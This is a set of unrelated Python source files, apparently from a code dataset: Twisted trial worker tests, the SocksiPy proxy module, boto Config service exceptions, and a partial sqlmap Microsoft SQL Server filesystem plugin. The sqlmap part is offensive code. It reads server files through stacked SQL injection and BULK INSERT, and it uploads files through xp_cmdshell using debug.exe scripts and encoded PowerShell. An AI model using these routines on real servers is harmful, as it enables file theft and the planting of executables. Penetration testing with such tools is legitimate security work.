d = self.worker.callRemote(managercommands.AddError,
testName=self.testName, error='error',
errorClass='exceptions.ValueError',
frames=[])
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.errors[0][0])
self.assertTrue(results)
def test_runErrorWithFrames(self):
"""
L{LocalWorkerAMP._buildFailure} recreates the C{Failure.frames} from
the C{frames} argument passed to C{AddError}.
"""
results = []
d = self.worker.callRemote(managercommands.AddError,
testName=self.testName, error='error',
errorClass='exceptions.ValueError',
frames=["file.py", "invalid code", "3"])
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.errors[0][0])
self.assertEqual(
[('file.py', 'invalid code', 3, [], [])],
self.result.errors[0][1].frames)
self.assertTrue(results)
def test_runFailure(self):
"""
Run a test, and fail.
"""
results = []
d = self.worker.callRemote(managercommands.AddFailure,
testName=self.testName, fail='fail',
failClass='exceptions.RuntimeError',
frames=[])
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.failures[0][0])
self.assertTrue(results)
def test_runSkip(self):
"""
Run a test, but skip it.
"""
results = []
d = self.worker.callRemote(managercommands.AddSkip,
testName=self.testName, reason='reason')
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.skips[0][0])
self.assertTrue(results)
def test_runUnexpectedSuccesses(self):
"""
Run a test, and succeed unexpectedly.
"""
results = []
d = self.worker.callRemote(managercommands.AddUnexpectedSuccess,
testName=self.testName,
todo='todo')
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.unexpectedSuccesses[0][0])
self.assertTrue(results)
def test_testWrite(self):
"""
L{LocalWorkerAMP.testWrite} writes the data received to its test
stream.
"""
results = []
stream = StringIO()
self.managerAMP.setTestStream(stream)
d = self.worker.callRemote(managercommands.TestWrite,
out="Some output")
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual("Some output\n", stream.getvalue())
self.assertTrue(results)
def test_stopAfterRun(self):
"""
L{LocalWorkerAMP.run} calls C{stopTest} on its test result once the
C{Run} commands has succeeded.
"""
result = object()
stopped = []
def fakeCallRemote(command, testCase):
return succeed(result)
self.managerAMP.callRemote = fakeCallRemote
class StopTestResult(TestResult):
def stopTest(self, test):
stopped.append(test)
d = self.managerAMP.run(self.testCase, StopTestResult())
self.assertEqual([self.testCase], stopped)
return d.addCallback(self.assertIdentical, result)
class FakeAMProtocol(AMP):
"""
A fake implementation of L{AMP} for testing.
"""
id = 0
dataString = ""
def dataReceived(self, data):
self.dataString += data
def setTestStream(self, stream):
self.testStream = stream
class FakeTransport(object):
"""
A fake process transport implementation for testing.
"""
dataString = ""
calls = 0
def writeToChild(self, fd, data):
self.dataString += data
def loseConnection(self):
self.calls += 1
class LocalWorkerTestCase(TestCase):
"""
Tests for L{LocalWorker} and L{LocalWorkerTransport}.
"""
def test_childDataReceived(self):
"""
L{LocalWorker.childDataReceived} forwards the received data to linked
L{AMP} protocol if the right file descriptor, otherwise forwards to
C{ProcessProtocol.childDataReceived}.
"""
fakeTransport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(fakeTransport)
localWorker._outLog = StringIO()
localWorker.childDataReceived(4, "foo")
localWorker.childDataReceived(1, "bar")
self.assertEqual("foo", localWorker._ampProtocol.dataString)
self.assertEqual("bar", localWorker._outLog.getvalue())
def test_outReceived(self):
"""
L{LocalWorker.outReceived} logs the output into its C{_outLog} log
file.
"""
fakeTransport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(fakeTransport)
localWorker._outLog = StringIO()
data = "The quick brown fox jumps over the lazy dog"
localWorker.outReceived(data)
self.assertEqual(data, localWorker._outLog.getvalue())
def test_errReceived(self):
"""
L{LocalWorker.errReceived} logs the errors into its C{_errLog} log
file.
"""
fakeTransport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(fakeTransport)
localWorker._errLog = StringIO()
data = "The quick brown fox jumps over the lazy dog"
localWorker.errReceived(data)
self.assertEqual(data, localWorker._errLog.getvalue())
def test_write(self):
"""
L{LocalWorkerTransport.write} forwards the written data to the given
transport.
"""
transport = FakeTransport()
localTransport = LocalWorkerTransport(transport)
data = "The quick brown fox jumps over the lazy dog"
localTransport.write(data)
self.assertEqual(data, transport.dataString)
def test_writeSequence(self):
"""
L{LocalWorkerTransport.writeSequence} forwards the written data to the
given transport.
"""
transport = FakeTransport()
localTransport = LocalWorkerTransport(transport)
data = ("The quick ", "brown fox jumps ", "over the lazy dog")
localTransport.writeSequence(data)
self.assertEqual("".join(data), transport.dataString)
def test_loseConnection(self):
"""
L{LocalWorkerTransport.loseConnection} forwards the call to the given
transport.
"""
transport = FakeTransport()
localTransport = LocalWorkerTransport(transport)
localTransport.loseConnection()
self.assertEqual(transport.calls, 1)
def test_connectionLost(self):
"""
L{LocalWorker.connectionLost} closes the log streams.
"""
class FakeStream(object):
callNumber = 0
def close(self):
self.callNumber += 1
transport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(transport)
localWorker._outLog = FakeStream()
localWorker._errLog = FakeStream()
localWorker.connectionLost(None)
self.assertEqual(localWorker._outLog.callNumber, 1)
self.assertEqual(localWorker._errLog.callNumber, 1)
def test_processEnded(self):
"""
L{LocalWorker.processEnded} calls C{connectionLost} on itself and on
the L{AMP} protocol.
"""
class FakeStream(object):
callNumber = 0
def close(self):
self.callNumber += 1
transport = FakeTransport()
protocol = FakeAMProtocol()
localWorker = LocalWorker(protocol, '.', 'test.log')
localWorker.makeConnection(transport)
localWorker._outLog = FakeStream()
localWorker.processEnded(Failure(CONNECTION_DONE))
self.assertEqual(localWorker._outLog.callNumber, 1)
self.assertIdentical(None, protocol.transport)
return self.assertFailure(localWorker.endDeferred, ConnectionDone)
def test_addresses(self):
"""
L{LocalWorkerTransport.getPeer} and L{LocalWorkerTransport.getHost}
return L{IAddress} objects.
"""
localTransport = LocalWorkerTransport(None)
self.assertTrue(verifyObject(IAddress, localTransport.getPeer()))
self.assertTrue(verifyObject(IAddress, localTransport.getHost()))
def test_transport(self):
"""
L{LocalWorkerTransport} implements L{ITransport} to be able to be used
by L{AMP}.
"""
localTransport = LocalWorkerTransport(None)
self.assertTrue(verifyObject(ITransport, localTransport))
def test_startError(self):
"""
L{LocalWorker} swallows the exceptions returned by the L{AMP} protocol
start method, as it generates unnecessary errors.
"""
def failCallRemote(command, directory):
return fail(RuntimeError("oops"))
transport = FakeTransport()
protocol = FakeAMProtocol()
protocol.callRemote = failCallRemote
localWorker = LocalWorker(protocol, '.', 'test.log')
localWorker.makeConnection(transport)
self.assertEqual([], self.flushLoggedErrors(RuntimeError))
| lgpl-3.0 | -8,039,814,673,655,041,000 | 29.955603 | 79 | 0.619246 | false |
konrado0/vosqa | forum_modules/oauthauth/lib/oauth2/httplib2/socks.py | 29 | 16293 | """SocksiPy - Python SOCKS module.
Version 1.00
Copyright 2006 Dan-Haim. All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of Dan Haim nor the names of his contributors may be used
to endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY DAN HAIM "AS IS" AND ANY EXPRESS OR IMPLIED
WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
EVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA
OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMANGE.
This module provides a standard socket-like interface for Python
for tunneling connections through SOCKS proxies.
"""
"""
Minor modifications made by Christopher Gilbert (http://motomastyle.com/)
for use in PyLoris (http://pyloris.sourceforge.net/)
Minor modifications made by Mario Vilas (http://breakingcode.wordpress.com/)
mainly to merge bug fixes found in Sourceforge
"""
import socket
import struct
import sys
if getattr(socket, 'socket', None) is None:
raise ImportError('socket.socket missing, proxy support unusable')
PROXY_TYPE_SOCKS4 = 1
PROXY_TYPE_SOCKS5 = 2
PROXY_TYPE_HTTP = 3
_defaultproxy = None
_orgsocket = socket.socket
class ProxyError(Exception): pass
class GeneralProxyError(ProxyError): pass
class Socks5AuthError(ProxyError): pass
class Socks5Error(ProxyError): pass
class Socks4Error(ProxyError): pass
class HTTPError(ProxyError): pass
_generalerrors = ("success",
"invalid data",
"not connected",
"not available",
"bad proxy type",
"bad input")
_socks5errors = ("succeeded",
"general SOCKS server failure",
"connection not allowed by ruleset",
"Network unreachable",
"Host unreachable",
"Connection refused",
"TTL expired",
"Command not supported",
"Address type not supported",
"Unknown error")
_socks5autherrors = ("succeeded",
"authentication is required",
"all offered authentication methods were rejected",
"unknown username or invalid password",
"unknown error")
_socks4errors = ("request granted",
"request rejected or failed",
"request rejected because SOCKS server cannot connect to identd on the client",
"request rejected because the client program and identd report different user-ids",
"unknown error")
def setdefaultproxy(proxytype=None, addr=None, port=None, rdns=True, username=None, password=None):
"""setdefaultproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
Sets a default proxy which all further socksocket objects will use,
unless explicitly changed.
"""
global _defaultproxy
_defaultproxy = (proxytype, addr, port, rdns, username, password)
def wrapmodule(module):
"""wrapmodule(module)
Attempts to replace a module's socket library with a SOCKS socket. Must set
a default proxy using setdefaultproxy(...) first.
This will only work on modules that import socket directly into the namespace;
most of the Python Standard Library falls into this category.
"""
if _defaultproxy != None:
module.socket.socket = socksocket
else:
raise GeneralProxyError((4, "no proxy specified"))
class socksocket(socket.socket):
"""socksocket([family[, type[, proto]]]) -> socket object
Open a SOCKS enabled socket. The parameters are the same as
those of the standard socket init. In order for SOCKS to work,
you must specify family=AF_INET, type=SOCK_STREAM and proto=0.
"""
def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None):
_orgsocket.__init__(self, family, type, proto, _sock)
if _defaultproxy != None:
self.__proxy = _defaultproxy
else:
self.__proxy = (None, None, None, None, None, None)
self.__proxysockname = None
self.__proxypeername = None
def __recvall(self, count):
"""__recvall(count) -> data
Receive EXACTLY the number of bytes requested from the socket.
Blocks until the required number of bytes have been received.
"""
data = self.recv(count)
while len(data) < count:
d = self.recv(count-len(data))
if not d: raise GeneralProxyError((0, "connection closed unexpectedly"))
data = data + d
return data
def setproxy(self, proxytype=None, addr=None, port=None, rdns=True, username=None, password=None):
"""setproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
Sets the proxy to be used.
proxytype - The type of the proxy to be used. Three types
are supported: PROXY_TYPE_SOCKS4 (including socks4a),
PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP
addr - The address of the server (IP or DNS).
port - The port of the server. Defaults to 1080 for SOCKS
servers and 8080 for HTTP proxy servers.
rdns - Should DNS queries be preformed on the remote side
(rather than the local side). The default is True.
Note: This has no effect with SOCKS4 servers.
username - Username to authenticate with to the server.
The default is no authentication.
password - Password to authenticate with to the server.
Only relevant when username is also provided.
"""
self.__proxy = (proxytype, addr, port, rdns, username, password)
def __negotiatesocks5(self, destaddr, destport):
"""__negotiatesocks5(self,destaddr,destport)
Negotiates a connection through a SOCKS5 server.
"""
# First we'll send the authentication packages we support.
if (self.__proxy[4]!=None) and (self.__proxy[5]!=None):
# The username/password details were supplied to the
# setproxy method so we support the USERNAME/PASSWORD
# authentication (in addition to the standard none).
self.sendall(struct.pack('BBBB', 0x05, 0x02, 0x00, 0x02))
else:
# No username/password were entered, therefore we
# only support connections with no authentication.
self.sendall(struct.pack('BBB', 0x05, 0x01, 0x00))
# We'll receive the server's response to determine which
# method was selected
chosenauth = self.__recvall(2)
if chosenauth[0:1] != chr(0x05).encode():
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
# Check the chosen authentication method
if chosenauth[1:2] == chr(0x00).encode():
# No authentication is required
pass
elif chosenauth[1:2] == chr(0x02).encode():
# Okay, we need to perform a basic username/password
# authentication.
self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.__proxy[5])) + self.__proxy[5])
authstat = self.__recvall(2)
if authstat[0:1] != chr(0x01).encode():
# Bad response
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
if authstat[1:2] != chr(0x00).encode():
# Authentication failed
self.close()
raise Socks5AuthError((3, _socks5autherrors[3]))
# Authentication succeeded
else:
# Reaching here is always bad
self.close()
if chosenauth[1] == chr(0xFF).encode():
raise Socks5AuthError((2, _socks5autherrors[2]))
else:
raise GeneralProxyError((1, _generalerrors[1]))
# Now we can request the actual connection
req = struct.pack('BBB', 0x05, 0x01, 0x00)
# If the given destination address is an IP address, we'll
# use the IPv4 address request even if remote resolving was specified.
try:
ipaddr = socket.inet_aton(destaddr)
req = req + chr(0x01).encode() + ipaddr
except socket.error:
# Well it's not an IP number, so it's probably a DNS name.
if self.__proxy[3]:
# Resolve remotely
ipaddr = None
req = req + chr(0x03).encode() + chr(len(destaddr)).encode() + destaddr
else:
# Resolve locally
ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
req = req + chr(0x01).encode() + ipaddr
req = req + struct.pack(">H", destport)
self.sendall(req)
# Get the response
resp = self.__recvall(4)
if resp[0:1] != chr(0x05).encode():
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
elif resp[1:2] != chr(0x00).encode():
# Connection failed
self.close()
if ord(resp[1:2])<=8:
raise Socks5Error((ord(resp[1:2]), _socks5errors[ord(resp[1:2])]))
else:
raise Socks5Error((9, _socks5errors[9]))
# Get the bound address/port
elif resp[3:4] == chr(0x01).encode():
boundaddr = self.__recvall(4)
elif resp[3:4] == chr(0x03).encode():
resp = resp + self.recv(1)
boundaddr = self.__recvall(ord(resp[4:5]))
else:
self.close()
raise GeneralProxyError((1,_generalerrors[1]))
boundport = struct.unpack(">H", self.__recvall(2))[0]
self.__proxysockname = (boundaddr, boundport)
if ipaddr != None:
self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)
else:
self.__proxypeername = (destaddr, destport)
def getproxysockname(self):
"""getsockname() -> address info
Returns the bound IP address and port number at the proxy.
"""
return self.__proxysockname
def getproxypeername(self):
"""getproxypeername() -> address info
Returns the IP and port number of the proxy.
"""
return _orgsocket.getpeername(self)
def getpeername(self):
"""getpeername() -> address info
Returns the IP address and port number of the destination
machine (note: getproxypeername returns the proxy)
"""
return self.__proxypeername
def __negotiatesocks4(self,destaddr,destport):
"""__negotiatesocks4(self,destaddr,destport)
Negotiates a connection through a SOCKS4 server.
"""
# Check if the destination address provided is an IP address
rmtrslv = False
try:
ipaddr = socket.inet_aton(destaddr)
except socket.error:
# It's a DNS name. Check where it should be resolved.
if self.__proxy[3]:
ipaddr = struct.pack("BBBB", 0x00, 0x00, 0x00, 0x01)
rmtrslv = True
else:
ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
# Construct the request packet
req = struct.pack(">BBH", 0x04, 0x01, destport) + ipaddr
# The username parameter is considered userid for SOCKS4
if self.__proxy[4] != None:
req = req + self.__proxy[4]
req = req + chr(0x00).encode()
# DNS name if remote resolving is required
# NOTE: This is actually an extension to the SOCKS4 protocol
# called SOCKS4A and may not be supported in all cases.
if rmtrslv:
req = req + destaddr + chr(0x00).encode()
self.sendall(req)
# Get the response from the server
resp = self.__recvall(8)
if resp[0:1] != chr(0x00).encode():
# Bad data
self.close()
raise GeneralProxyError((1,_generalerrors[1]))
if resp[1:2] != chr(0x5A).encode():
# Server returned an error
self.close()
if ord(resp[1:2]) in (91, 92, 93):
self.close()
raise Socks4Error((ord(resp[1:2]), _socks4errors[ord(resp[1:2]) - 90]))
else:
raise Socks4Error((94, _socks4errors[4]))
# Get the bound address/port
self.__proxysockname = (socket.inet_ntoa(resp[4:]), struct.unpack(">H", resp[2:4])[0])
if rmtrslv != None:
self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)
else:
self.__proxypeername = (destaddr, destport)
def __negotiatehttp(self, destaddr, destport):
"""__negotiatehttp(self,destaddr,destport)
Negotiates a connection through an HTTP server.
"""
# If we need to resolve locally, we do this now
if not self.__proxy[3]:
addr = socket.gethostbyname(destaddr)
else:
addr = destaddr
self.sendall(("CONNECT " + addr + ":" + str(destport) + " HTTP/1.1\r\n" + "Host: " + destaddr + "\r\n\r\n").encode())
# We read the response until we get the string "\r\n\r\n"
resp = self.recv(1)
while resp.find("\r\n\r\n".encode()) == -1:
resp = resp + self.recv(1)
# We just need the first line to check if the connection
# was successful
statusline = resp.splitlines()[0].split(" ".encode(), 2)
if statusline[0] not in ("HTTP/1.0".encode(), "HTTP/1.1".encode()):
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
try:
statuscode = int(statusline[1])
except ValueError:
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
if statuscode != 200:
self.close()
raise HTTPError((statuscode, statusline[2]))
self.__proxysockname = ("0.0.0.0", 0)
self.__proxypeername = (addr, destport)
def connect(self, destpair):
"""connect(self, despair)
Connects to the specified destination through a proxy.
destpar - A tuple of the IP/DNS address and the port number.
(identical to socket's connect).
To select the proxy server use setproxy().
"""
# Do a minimal input check first
if (not type(destpair) in (list,tuple)) or (len(destpair) < 2) or (type(destpair[0]) != type('')) or (type(destpair[1]) != int):
raise GeneralProxyError((5, _generalerrors[5]))
if self.__proxy[0] == PROXY_TYPE_SOCKS5:
if self.__proxy[2] != None:
portnum = self.__proxy[2]
else:
portnum = 1080
_orgsocket.connect(self, (self.__proxy[1], portnum))
self.__negotiatesocks5(destpair[0], destpair[1])
elif self.__proxy[0] == PROXY_TYPE_SOCKS4:
if self.__proxy[2] != None:
portnum = self.__proxy[2]
else:
portnum = 1080
_orgsocket.connect(self,(self.__proxy[1], portnum))
self.__negotiatesocks4(destpair[0], destpair[1])
elif self.__proxy[0] == PROXY_TYPE_HTTP:
if self.__proxy[2] != None:
portnum = self.__proxy[2]
else:
portnum = 8080
_orgsocket.connect(self,(self.__proxy[1], portnum))
self.__negotiatehttp(destpair[0], destpair[1])
elif self.__proxy[0] == None:
_orgsocket.connect(self, (destpair[0], destpair[1]))
else:
raise GeneralProxyError((4, _generalerrors[4]))
| gpl-3.0 | 6,213,641,939,644,820,000 | 41.319481 | 136 | 0.609955 | false |
zachmullen/boto | boto/configservice/exceptions.py | 135 | 2528 | # Copyright (c) 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.exception import BotoServerError
class InvalidLimitException(BotoServerError):
pass
class NoSuchBucketException(BotoServerError):
pass
class InvalidSNSTopicARNException(BotoServerError):
pass
class ResourceNotDiscoveredException(BotoServerError):
pass
class MaxNumberOfDeliveryChannelsExceededException(BotoServerError):
pass
class LastDeliveryChannelDeleteFailedException(BotoServerError):
pass
class InsufficientDeliveryPolicyException(BotoServerError):
pass
class InvalidRoleException(BotoServerError):
pass
class InvalidTimeRangeException(BotoServerError):
pass
class NoSuchDeliveryChannelException(BotoServerError):
pass
class NoSuchConfigurationRecorderException(BotoServerError):
pass
class InvalidS3KeyPrefixException(BotoServerError):
pass
class InvalidDeliveryChannelNameException(BotoServerError):
pass
class NoRunningConfigurationRecorderException(BotoServerError):
pass
class ValidationException(BotoServerError):
pass
class NoAvailableConfigurationRecorderException(BotoServerError):
pass
class InvalidNextTokenException(BotoServerError):
pass
class InvalidConfigurationRecorderNameException(BotoServerError):
pass
class NoAvailableDeliveryChannelException(BotoServerError):
pass
class MaxNumberOfConfigurationRecordersExceededException(BotoServerError):
pass
| mit | 5,010,268,583,664,105,000 | 23.543689 | 77 | 0.800633 | false |
sanghinitin/golismero | tools/sqlmap/plugins/dbms/mssqlserver/filesystem.py | 8 | 14284 | #!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import ntpath
import os
from lib.core.common import getLimitRange
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import posixToNtSlashes
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.convert import hexencode
from lib.core.data import conf
from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def __init__(self):
GenericFilesystem.__init__(self)
def _dataToScr(self, fileContent, chunkName):
fileLines = []
fileSize = len(fileContent)
lineAddr = 0x100
lineLen = 20
fileLines.append("n %s" % chunkName)
fileLines.append("rcx")
fileLines.append("%x" % fileSize)
fileLines.append("f 0100 %x 00" % fileSize)
for fileLine in xrange(0, len(fileContent), lineLen):
scrString = ""
for lineChar in fileContent[fileLine:fileLine + lineLen]:
strLineChar = hexencode(lineChar)
if not scrString:
scrString = "e %x %s" % (lineAddr, strLineChar)
else:
scrString += " %s" % strLineChar
lineAddr += len(lineChar)
fileLines.append(scrString)
fileLines.append("w")
fileLines.append("q")
return fileLines
def _updateDestChunk(self, fileContent, tmpPath):
randScr = "tmpf%s.scr" % randomStr(lowercase=True)
chunkName = randomStr(lowercase=True)
fileScrLines = self._dataToScr(fileContent, chunkName)
logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr))
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr)
logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr))
commands = ("cd %s" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
return chunkName
def stackedReadFile(self, rFile):
infoMsg = "fetching file: '%s'" % rFile
logger.info(infoMsg)
result = []
txtTbl = self.fileTblName
hexTbl = "%shex" % self.fileTblName
self.createSupportTbl(txtTbl, self.tblField, "text")
inject.goStacked("DROP TABLE %s" % hexTbl)
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
logger.debug("loading the content of file '%s' into support table" % rFile)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True)
# Reference: http://support.microsoft.com/kb/104829
binToHexQuery = """DECLARE @charset VARCHAR(16)
DECLARE @counter INT
DECLARE @hexstr VARCHAR(4096)
DECLARE @length INT
DECLARE @chunk INT
SET @charset = '0123456789ABCDEF'
SET @counter = 1
SET @hexstr = ''
SET @length = (SELECT DATALENGTH(%s) FROM %s)
SET @chunk = 1024
WHILE (@counter <= @length)
BEGIN
DECLARE @tempint INT
DECLARE @firstint INT
DECLARE @secondint INT
SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s))
SET @firstint = floor(@tempint/16)
SET @secondint = @tempint - (@firstint * 16)
SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1)
SET @counter = @counter + 1
IF @counter %% @chunk = 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
SET @hexstr = ''
END
END
IF @counter %% (@chunk) != 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
END
""" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ")
inject.goStacked(binToHexQuery)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False)
if not result:
result = []
count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
errMsg = "unable to retrieve the content of the "
errMsg += "file '%s'" % rFile
raise SqlmapNoneDataException(errMsg)
indexRange = getLimitRange(count)
for index in indexRange:
chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
result.append(chunk)
inject.goStacked("DROP TABLE %s" % hexTbl)
return result
def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False):
errMsg = "Microsoft SQL Server does not support file upload with "
errMsg += "UNION query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg)
def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using PowerShell to write the %s file content " % fileType
infoMsg += "to file '%s', please wait.." % dFile
logger.info(infoMsg)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
encodedFileContent = hexencode(wFileContent)
# TODO: need to be fixed
psString = "$s = gc '%s';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %%{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('%s',$b)" % (randFilePath, dFile)
psString = psString.encode('utf-16le')
psString = psString.encode("base64")[:-1].replace("\n", "")
logger.debug("uploading the file hex-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("converting the file utilizing PowerShell EncodedCommand")
commands = ("cd %s" % tmpPath,
"powershell -EncodedCommand %s" % psString,
"del /F /Q %s" % randFilePath)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % dFile
logger.info(infoMsg)
dFileName = ntpath.basename(dFile)
sFile = "%s\%s" % (tmpPath, dFileName)
wFileSize = os.path.getsize(wFile)
debugSize = 0xFF00
if wFileSize < debugSize:
chunkName = self._updateDestChunk(wFileContent, tmpPath)
debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile)
logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
else:
debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload "
debugMsg += "it chunk by chunk and recreate the original file "
debugMsg += "on the server, please wait.."
logger.debug(debugMsg)
for i in xrange(0, wFileSize, debugSize):
wFileChunk = wFileContent[i:i + debugSize]
chunkName = self._updateDestChunk(wFileChunk, tmpPath)
if i == 0:
debugMsg = "renaming chunk "
copyCmd = "ren %s %s" % (chunkName, dFileName)
else:
debugMsg = "appending chunk "
copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
logger.debug(debugMsg)
commands = ("cd %s" % tmpPath, copyCmd, "del /F %s" % chunkName)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
commands = ("cd %s" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using a custom visual basic script to write the "
infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile)
logger.info(infoMsg)
